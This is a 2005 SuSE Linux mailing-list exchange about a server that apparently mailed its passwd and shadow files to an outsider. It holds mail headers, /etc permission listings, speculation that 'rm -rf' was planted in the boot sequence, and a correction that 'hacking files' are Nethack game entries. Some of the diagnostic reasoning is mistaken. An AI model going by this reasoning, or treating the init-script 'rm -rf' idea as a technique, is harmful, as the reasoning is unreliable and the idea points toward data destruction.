On Sun, Mar 13, 2005 at 09:06:26PM -0600, Henry Tang wrote:
Only if you don't boot the machine again.
If rm -rf has been put into the init sequence (perhaps /etc/boot) then by starting the machine again the rogue code will be started and do it's damage.
You can boot with knoppix and then mount your partitions and examine them for damage.
Did you install tripwire?
Tripwire looks like a pretty good software! So i still that after booting with knoppix?
I looked into my system and this is what I found and wonder.
Does this show that the email was sent by root?
H??Received: (from root@localhost) by main.yucreation.com (8.11.6/8.11.6/SuSE Linux 0.5) id j2A9fEW12735 for Blondu@mamef.us; Thu, 10 Mar 2005 03:41:14 -0600 H?D?Date: Thu, 10 Mar 2005 03:41:14 -0600 H?F?From: root <root>
I think the hack that sends out the email with shadow and passwd listing either has root access or shadow group access. Becuase according to this below it shows that only user of shadow or root can read the file. If the hacker has root, what is the purpose of getting the system config or shadow file via email.. I don't see a reason going through all that trouble. So must be user gdm.
GDM is an application like KDM which shows a GUI log in...
shadow:x:15:root,gdm
-rw-r--r-- 1 root root 3102 Mar 11 03:49 passwd -rw-r--r-- 1 root root 3102 Jan 5 23:26 passwd- -rw-r--r-- 1 root root 2761 Oct 8 2003 passwd.bak -rw-r--r-- 1 root root 2942 Nov 23 2003 passwd.old main:/etc # ls -la | grep shadow -rw-r--r-- 1 root shadow 772 Feb 9 15:35 group -rw-r--r-- 1 root shadow 744 Oct 7 2003 group.bak -rw-r----- 1 root shadow 765 Nov 7 2003 gshadow -rw------- 1 root root 755 Nov 7 2003 gshadow- -rw-r----- 1 root shadow 1859 Mar 11 04:26 shadow -rw-r----- 1 root shadow 1819 Jan 12 12:07 shadow- -rw-r----- 1 root shadow 1361 Oct 8 2003 shadow.bak -rw-r----- 1 root shadow 1859 Mar 11 04:24 shadow.old
In the file listing like below.. It is open to anyone so that doesn't explain much. :9
===============================================================
Mainly replying to point something out here: Nethack is a game. They aren't "hacking files".
Hacking Files.. /etc/opt/gnome/SuSE/Games/TacticStrategy/xnethack.desktop /etc/opt/kde2/share/applnk/SuSE/Games/TacticStrategy/xnethack.desktop /etc/X11/susewm/AddEntrys/SuSE/Games/Action/nethack.desktop /etc/X11/susewm/AddEntrys/SuSE/Games/TacticStrategy/nethack.desktop /etc/X11/susewm/AddEntrys/SuSE/Games/TacticStrategy/xnethack.desktop /etc/X11/susewm/AddEntrys/SuSE/Games/unspec/gnomehack.-368.desktop /etc/X11/susewm/AddEntrys/SuSE/Games/unspec/gnomehack.desktop /home/choad/ftp/appz/Macromedia_Studio_MX/FreeHand/Goodies/Assets/Templates/WebS ite Templates/Snake Shack.FT9 /home/henry/hacking /home/henry/_desktop/replays/hacked.rep /home/henry/_desktop/replays/hacked2.rep /opt/gnome/share/gnome/distribution-menus/SuSE/Games/TacticStrategy/xnethack.des ktop /opt/gnome/share/sawfish/1.0/lisp/sawfish/wm/ext/3d-hack.jl /opt/gnome/share/sawfish/1.0/lisp/sawfish/wm/ext/3d-hack.jlc /usr/games/nethack /usr/games/nethack.d /usr/games/nethack.d/nethack.qt
-- Check the headers for your unsubscription address For additional commands send e-mail to suse-linux-e-help@suse.com Also check the archives at http://lists.suse.com Please read the FAQs: suse-linux-e-faq@suse.com